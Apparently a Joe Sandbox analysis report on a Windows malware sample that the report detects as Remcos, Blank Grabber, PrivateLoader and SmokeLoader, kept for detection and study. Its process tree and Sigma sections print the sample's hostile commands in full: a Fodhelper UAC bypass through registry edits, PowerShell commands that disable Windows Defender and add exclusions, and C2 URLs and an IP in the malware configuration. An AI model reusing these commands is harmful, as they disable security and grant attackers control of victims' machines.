Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Og1SeeXcB2.exe

Overview

General Information

Sample name:Og1SeeXcB2.exe
renamed because original name is a hash value
Original sample name:150e9ffdac7f2361c2efa735929aa268.exe
Analysis ID:1438370
MD5:150e9ffdac7f2361c2efa735929aa268
SHA1:3ed43e5fb5cd202d91fe31c4a0f8674e5fdb0759
SHA256:d54259b35ece6e39b159317128bfd62f88abbaadd92537379c4bae078e82fe69
Tags:exe
Infos:

Detection

Remcos, Blank Grabber, PrivateLoader, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Fodhelper UAC Bypass
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
UAC bypass detected (Fodhelper)
Yara detected Blank Grabber
Yara detected PrivateLoader
Yara detected Remcos RAT
Yara detected SmokeLoader
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Drops PE files with a suspicious file extension
Found API chain indicative of debugger detection
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Windows Defender protection settings
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Script Execution From Temp Folder
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Reg Add Open Command
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Og1SeeXcB2.exe (PID: 6612 cmdline: "C:\Users\user\Desktop\Og1SeeXcB2.exe" MD5: 150E9FFDAC7F2361C2EFA735929AA268)
    • cmd.exe (PID: 6800 cmdline: "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7012 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2004 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7128 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7136 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4080 cmdline: cmd /c md 1181 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 1432 cmdline: findstr /V "perulesserpalacecorrespondence" Video MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7148 cmdline: cmd /c copy /b Outlook + Imports 1181\U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • End.pif (PID: 2120 cmdline: 1181\End.pif 1181\U MD5: 62D09F076E6E0240548C2F837536A46A)
        • End.pif (PID: 7072 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif MD5: 62D09F076E6E0240548C2F837536A46A)
        • End.pif (PID: 7068 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif MD5: 62D09F076E6E0240548C2F837536A46A)
        • End.pif (PID: 6992 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif MD5: 62D09F076E6E0240548C2F837536A46A)
          • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
            • DE5A.exe (PID: 4348 cmdline: C:\Users\user\AppData\Local\Temp\DE5A.exe MD5: CB769D049C4541F926F5D6B8D1FF5929)
              • DE5A.exe (PID: 3468 cmdline: C:\Users\user\AppData\Local\Temp\DE5A.exe MD5: CB769D049C4541F926F5D6B8D1FF5929)
                • cmd.exe (PID: 1612 cmdline: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • reg.exe (PID: 1888 cmdline: reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • cmd.exe (PID: 3796 cmdline: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • reg.exe (PID: 2516 cmdline: reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • cmd.exe (PID: 5592 cmdline: C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • wevtutil.exe (PID: 5184 cmdline: wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text MD5: 1AAE26BD68B911D0420626A27070EB8D)
                • cmd.exe (PID: 1448 cmdline: C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • ComputerDefaults.exe (PID: 412 cmdline: computerdefaults --nouacbypass MD5: D25A9E160E3B74EF2242023726F15416)
                  • ComputerDefaults.exe (PID: 1284 cmdline: "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass MD5: D25A9E160E3B74EF2242023726F15416)
                  • ComputerDefaults.exe (PID: 1988 cmdline: "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass MD5: D25A9E160E3B74EF2242023726F15416)
                    • DE5A.exe (PID: 3588 cmdline: "C:\Users\user\AppData\Local\Temp\DE5A.exe" MD5: CB769D049C4541F926F5D6B8D1FF5929)
                      • DE5A.exe (PID: 5632 cmdline: "C:\Users\user\AppData\Local\Temp\DE5A.exe" MD5: CB769D049C4541F926F5D6B8D1FF5929)
                        • cmd.exe (PID: 2312 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • powershell.exe (PID: 4908 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
                        • cmd.exe (PID: 2116 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • powershell.exe (PID: 4928 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
                          • MpCmdRun.exe (PID: 3760 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
                        • cmd.exe (PID: 332 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • powershell.exe (PID: 4416 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
                            • WmiPrvSE.exe (PID: 5180 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
                        • cmd.exe (PID: 5720 cmdline: C:\Windows\system32\cmd.exe /c "start bound.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 2484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • bound.exe (PID: 1860 cmdline: bound.exe MD5: E5C79A33139A13DAAC52DA8DD0ABFC68)
                            • WindowsUpdateServices.exe (PID: 6948 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe" MD5: E5C79A33139A13DAAC52DA8DD0ABFC68)
                              • iexplore.exe (PID: 2004 cmdline: "c:\program files (x86)\internet explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
                        • cmd.exe (PID: 5304 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • tasklist.exe (PID: 5856 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                        • cmd.exe (PID: 5084 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • WMIC.exe (PID: 6460 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
                • cmd.exe (PID: 1312 cmdline: C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • wevtutil.exe (PID: 1016 cmdline: wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text MD5: 1AAE26BD68B911D0420626A27070EB8D)
                • cmd.exe (PID: 5840 cmdline: C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • reg.exe (PID: 5212 cmdline: reg delete hkcu\Software\Classes\ms-settings /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • PING.EXE (PID: 3548 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wsruwii (PID: 1028 cmdline: C:\Users\user\AppData\Roaming\wsruwii MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}

Threatname: Remcos

{"Host:Port:Password": "193.149.176.178:2404:1", "Assigned name": "WindowsUpdateServices", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "WindowsUpdateServices.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ZZZU66", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI43482\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
          C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6aaa8:$a1: Remcos restarted by watchdog!
          • 0x6b020:$a3: %02i:%02i:%02i:%03i
          Click to see the 3 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
              • 0xaa60:$a1: Remcos restarted by watchdog!
              • 0xafd8:$a3: %02i:%02i:%02i:%03i
              0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                00000027.00000003.2469980302.000001FEA781A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  Click to see the 65 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  66.2.WindowsUpdateServices.exe.630000.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    66.2.WindowsUpdateServices.exe.630000.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      66.2.WindowsUpdateServices.exe.630000.1.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
                        66.2.WindowsUpdateServices.exe.630000.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                        • 0x6aaa8:$a1: Remcos restarted by watchdog!
                        • 0x6b020:$a3: %02i:%02i:%02i:%03i
                        66.2.WindowsUpdateServices.exe.630000.1.unpackREMCOS_RAT_variantsunknownunknown
                        • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
                        • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                        • 0x64b6c:$str_b2: Executing file:
                        • 0x65bec:$str_b3: GetDirectListeningPort
                        • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                        • 0x65718:$str_b7: \update.vbs
                        • 0x64b94:$str_b9: Downloaded file:
                        • 0x64b80:$str_b10: Downloading file:
                        • 0x64c24:$str_b12: Failed to upload file:
                        • 0x65bb4:$str_b13: StartForward
                        • 0x65bd4:$str_b14: StopForward
                        • 0x65670:$str_b15: fso.DeleteFile "
                        • 0x65604:$str_b16: On Error Resume Next
                        • 0x656a0:$str_b17: fso.DeleteFolder "
                        • 0x64c14:$str_b18: Uploaded file:
                        • 0x64bd4:$str_b19: Unable to delete:
                        • 0x65638:$str_b20: while fso.FileExists("
                        • 0x650b1:$str_c0: [Firefox StoredLogins not found]
                        Click to see the 43 entries

                        Sigma Signatures

                        Privilege Escalation

                        barindex
                        Sigma detected: Fodhelper UAC Bypass
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f", CommandLine: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentImage: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentProcessId: 3468, ParentProcessName: DE5A.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f", ProcessId: 1612, ProcessName: cmd.exe

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DE5A.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentProcessId: 5632, ParentProcessName: DE5A.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", ProcessId: 2312, ProcessName: cmd.exe
                        Sigma detected: Powershell Defender Disable Scan Feature
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DE5A.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentProcessId: 5632, ParentProcessName: DE5A.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 2116, ProcessName: cmd.exe
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2312, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe', ProcessId: 4908, ProcessName: powershell.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bound.exe, ProcessId: 1860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-ZZZU66
                        Sigma detected: Execution of Suspicious File Type Extension
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 1181\End.pif 1181\U, CommandLine: 1181\End.pif 1181\U, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6800, ParentProcessName: cmd.exe, ProcessCommandLine: 1181\End.pif 1181\U, ProcessId: 2120, ProcessName: End.pif
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DE5A.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentProcessId: 5632, ParentProcessName: DE5A.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", ProcessId: 2312, ProcessName: cmd.exe
                        Sigma detected: Remote Thread Creation By Uncommon Source Image
